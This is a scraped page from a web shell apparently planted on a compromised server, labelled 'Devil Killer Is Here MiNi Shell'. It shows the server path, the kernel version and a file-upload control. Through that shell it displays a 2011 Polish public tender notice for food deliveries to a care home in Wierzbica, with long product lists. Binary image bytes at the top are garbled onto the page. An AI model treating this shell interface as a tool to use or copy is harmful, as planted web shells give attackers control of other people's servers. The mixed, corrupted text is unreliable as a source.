JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111125/309137-N-2011.html

<p class="kh_header"><b>Wierzbica: DOSTAWA  ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 309137 - 2011; data zamieszczenia: 25.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Sienkiewicza 37, 26-680 Wierzbica, woj. mazowieckie, tel. 048 6182059, faks 048 6182059.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i rozładunek artykułów spożywczych do DPS w Wierzbicy ul. Sienkiewicza 37. 
Zamówienie zostało podzielone na części:
Część I	
CPV 15100000-9   produkty zwierzęce, mięso i produkty mięsne					
Część II 
CPV 15800000-6 różne produkty spożywcze
Część III
CPV 15500000-3 produkty mleczarskie
Część IV 
CPV 15810000 - pieczywo świeże i wyroby piekarskie
Część V 
CPV 15200000 - ryby przetworzone i konserwowe.
Część VI 
CPV 15300000-1 owoce, warzywa i podobne produkty
Szczegółowy opis przedmiotu zamówienia stanowią załączniki do niniejszej specyfikacji. 
1. Dostawca zobowiązuje  się dostarczać towar do siedziby zamawiającego własnym transportem, na własny koszt i na własne ryzyko oraz do elastycznego reagowania na zwiększone lub zmniejszone potrzeby zamawiającego w stosunku do danego asortymentu lub całości dost
2. Każdy samochód, którym będzie dostarczana żywność musi posiadać decyzję Państwowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów.
3. Produkcja i warunki transportu zamówionych produktów będą odpowiadały zasadom Dobrej Praktyki Produkcyjnej (GMP) i Dobrej Praktyki higienicznej (GHP). Dostawca zagwarantuje zamawiającemu, że dostarczone produkty będą odpowiadały przepisom ustawy z dnia 25 sierpnia 2006r o bezpieczeństwie żywności i żywienia (Dz.U. z 2010r. Nr 21, poz. 105).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument potwierdzający posiadanie środka transportu spełniającego wymogi sanitarne dotyczące środków transportu żywności.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswierzbica.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Domu Pomocy Społecznej
				     ul. Sienkiewicza 37
				     26-680 Wierzbica
	         w dziale administracyjno-gospodarczym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 11:00, miejsce: Domu Pomocy Społecznej
				     ul. Sienkiewicza 37
				     26-680 Wierzbica
	         w dziale administracyjno-gospodarczym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Baleron	
kg	
50

2.	
Baleron mielony	
kg	
200

3.	
Baton drobiowy szynkowy	
kg	
260

4.	
Blok zapiekany	
kg	
225

5.	
Boczek mielony (wędlina)	
kg	
200

6.	
Farsz na pierogi	
kg	
15

7.	
Golonka (wędlina)	
kg	
230

8	
Karkówka z kością	
kg	
500

9.	
Kaszanka	
kg	
180

10.	
Kiełbasa krakowska	
kg	
250

11.	
Kiełbasa szynkowa	
kg	
250

12.	
Kiełbasa toruńska	
kg	
180

13.	
Kiełbasa wiejska	
kg	
5

14.	
Kiełbasa zwykła	
kg	
350

15.	
Kiełbasa gilowa	
kg	
220

16.	
Kiełbasa serwolatka	
kg	
200

17.	
Kości wieprzowe (rurkowe)	
kg	
1 000

18.	
Kurczaki	
kg	
800

19.	
Łopatka z kością	
kg	
900

20.	
Mielonka wieprzowa (wędlina na kanapki)	
kg	
180

21	
Mięso mielone (wieprzowe)	
kg	
150

22.	
Mortadel	
kg	
200

23.	
Ogonówka wędzona	
kg	
30

24.	
Parówki	
kg	
250

25.	
Parówkowa	
kg	
250

26.	
Pasztet drobiowy	
kg	
110

27.	
Pasztet wieprzowy	
kg	
150

28.	
Pasztetowa	
kg	
200

29.	
Pieczeń rzymska	
kg	
200

30.	
Płuca wieprzowe	
kg	
120

31.	
Polędwica drobiowa	
kg	
220

32.	
Salceson włoski	
kg	
150

33.	
Serca drobiowe	
kg	
150

34.	
Słonina	
kg	
95

35.	
Smalec	
kg	
40

36.	
Szynka wieprzowa (wędlina)	
kg	
20

37.	
Szynka drobiowa	
kg	
250

38.	
Udka	
kg	
350

39.	
Wątróbka drobiowa	
kg	
180

40.	
Wołowina z kością - rozbrat	
kg	
500

41.	
Żebra wieprzowe	
kg	
250

42.	
Kiełbasa żywiecka	
kg	
160

43. 	
Serca wieprzowe	
kg	
150

44	
Żołądki drobiowe	
kg	
180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Barszcz biały w proszku opakowanie 66 g	
szt	 
900

2.	
Budyń (op. 40 g)	
szt	
1000

3.	
Bułka tarta 	
kg	
250

4.	
Chrzan w słoiku (op. 290g)	
szt	
380

5.	
Cukier 	
kg	
2 700

6.	
Cukier puder	
kg	
12

7.	
Cukier waniliowy (op. 32g)	
szt	
180

8	
Cynamon (op. 20g)	
szt	
30

9.	
Ćwikła (słoik 250 g)	
szt	
25

10.	
Drożdże (op. 100 g)	
szt	
20

11.	
Dżem niskosłodzony (op.260 g)	
szt	
450

12.	
Galaretka owocowa	
szt	
20

13.	Groszek konserwowy (puszka lub słoik 400g)	
szt	
240

14.	
Herbata (granulat op. 100g)	
szt	
1 100

15.	
Kakao (op. 100 g)	
szt	
70

16.	
Kasza gryczana 	
kg	
80

17.	
Kasza jęczmienna 	
kg	
200

18.	
Kasza manna	
kg	
200

19.	Kawa zbożowa rozpuszczalna (op.250 g)	
szt	
130

20.	
Ketchup (op 1 litr)	
szt	
200

21	
Kisiel (op. 40g)	
szt	
1000

22.	
Koncentrat pomidorowy (op. 0,9 l)	szt	
150

23.	
Krem do ciast 	
szt	
10

24.	
Kwasek cytrynowy (op. 25g)	
szt	
750

25.	Liście laurowe (op. 10g)	
szt	
50

26.	Majeranek (op. 10g)	
szt	
100

27.	Majonez (op. 1l)	
szt	
420

28.	Mak (op. 1 kg)	
szt	
10

29.	Makaron świderki (op. 5 kg)	
szt	
240

30.	Makaron nitki (op. 5kg)	
szt	
150

31.	Margaryna	
kg	
8

32.	Mąka pszenna (op. 5kg)	
kg	
800

33.	Mąka ziemniaczana (op. 1 kg)	
kg	
210

34.	Miód naturalny (op. 1 l)	
szt	
50

35.	Musztarda (op. 1 l)	
szt	
160

36.	Ocet (op. 1l)	
szt	
15

37.	Olej uniwersalny (op. 5 l)	
szt	
100

38.	Olejek do ciast 	
szt	
20

39.	Pieprz mielony (op. 15g)	
szt	
550

40.	Płatki jęczmienne (op. 600g)	
szt	
320

41.	
Płatki kukurydziane	
kg	
250

42.	
Płatki owsiane 	
kg	
150

43.	
Polewa czekoladowa	
szt	
10

44.	
Proszek do pieczenia (op. 30g)	
szt	
100

45. 	
Przyprawa warzywna (op. 1 kg) 	
szt	
90

46.	Przyprawa do potraw w płynie (op. 1 l)	
szt	
20
47.	Rodzynki (op. kg)	szt	2


48.	
Ryż 	
kg	
420

49.	
Sok owocowo-warzywny zagęszczany w butelce  (op. 1 l)
	

szt	

1000

50.	
Sól 	
kg	
420

51.	
Syrop owocowy wysokosłodzony (op. 0,50l) 	

szt	

1800

52.	
Ziele angielskie (op. 15 g)	
szt	
50

53. 	
Zioła prowansalskie (op 10g)	
szt 	
50

53. 	
Żelatyna (op	
szt	
30

54.	
Bazylia  (op. 10g)	
szt	
50

55.	
Tymianek (op 10g)	
szt	
50

56	
Oregano (op. 10g)	
szt	
50

57.	
Przyprawa do kurczaka (op.20g)	
szt	
80

58. 	
Przyprawa do wieprzowiny (20g)	
szt	
50

59.	
Przyprawa do wołowiny (op. 20g)	
szt	
50

60.	
Gałka muszkatołowa (op.10g)	
szt.	
50

61.	
Papryka słodka (op.20g)	
szt	
50

62.	
Papryka ostra (op20g)	
szt	
50

63.	
Pieprz ziołowy (20g)	
szt	
50

64.	
Curry (op. 25g)	
szt	
50

65	
Wafle śmietankowe (180 g)	
szt	
60

66.	
Herbatniki (65 g)	
szt	
60

67.	
Biszkopty (100g)	
szt	
60

68.	
Paluszki ( 80g)	
szt	
60

69.	
Baton MARS (op. 47 g)	
szt	
80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Mleko 1,5 %	
litr	  
25 700

2.	
Ser biały półtłusty	
kg	
700

3.	
Ser twardy	
kg	
320

4.	
Serek homogenizowany (op. 200g)	
szt	
3 200

5.	
Serek topiony (op. 100g) 	
szt	
2 900

6.	
Śmietana 18% (op. 400g)	
szt	
2 500

7.	
Masło extra kostka 200g	
szt	
6 700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pieczywo świeże i wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Bułka pszenna (50g)	
szt	
26 500

2.	
Bułka pszenna (400g) (gryzka)	
szt	
5 500

3.	
Chleb pszenno-żytni - krojony (600 g)	
szt	
14700


4.	
Chleb graham - krojony (500 g)	
szt	
4 700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ryby przetworzone i koserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	
Filet z miruny	
kg	
600

2.	
Paprykarz szczeciński (op. 330g)	
szt	
100

3.	
Śledź salinat	
kg	
100

4.	
Śledź w oleju (op. 170g)	
sz	
250

5.	
Śledź w pomidorach (op.170g)	
szt	
250

6.	
Szprot w oleju (op.170g)	
szt	
250

7.	
Szprot w pomidorach (op. 170g)	
szt	
250

8.	
Ryba wędzona	
kg	
50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> owoce, warzywa i podobne produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	
Arbuz	
kg	
150

2	
Banany 	
kg	
40

3	
Botwina	
Pęczki	
80

4	
Buraki	
kg	
1 000

5	
Brokuły	
szt	
80

6	
Cebula	
kg	
500

7	
Cytryny	
kg	
           6

8	
Fasola biała	
kg	
80

9	
Fasola szparagowa	kg	
50

10	
Groch łupany	
kg	
80
11
	
Grzyby suszone	
kg	
0,5

12	
Jabłka	
kg	
2 500

13	
Kalafior	
szt	
150
14	
Kapusta biała	
kg	
3 250
15	
Kapusta granatowa	
kg	
700
16	
Kapusta kiszona	
kg	
200
17	
Kapusta pekińska	
kg	
700

18	
Kapusta młoda	
kg	
300

19	
Kapusta włoska	
kg	
800

20	
Koper	
pęczki	
200

21	
Mandarynki	
kg	
30

22	
Marchew	
Kg	
2 800

23	
Ogórek świeży	
Kg	
400

24	
Ogórki kiszone	
Kg	
400

25	
Papryka	
Kg	
100

26	
Pieczarki	
kg	
250

27	
Pietruszka	
kg	
550

28	
Pietruszka  zielona	
pęczki	
100


29	
Pomidory	
kg	270

30	
Por	
kg	500


31	
Porzeczka czarna	
Kg	
150

32	
Rabarbar	
kg	
80

33	
Rzodkiewka	
pęczki	
200

34	
Sałata zielona	
szt	
600

35	
Seler	
kg	
550

36	
Susz  owocowy -  jabłko	
Kg	
5

37	
Susz owocowy- śliwka	
kg	
5

38	
Susz owocowy - gruszka	
Kg	
5

39	
Susz warzywny (5 kg)	
szt	
11

40	
Szczaw	
pęczki	
40
41	
Szczypior	
pęczki	
50
42	
Śliwka	
kg	
150

43	
Truskawka	
kg	
100

44	
Wiśnia	
kg	
150

45	
Ziemniaki	
kg	
15 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com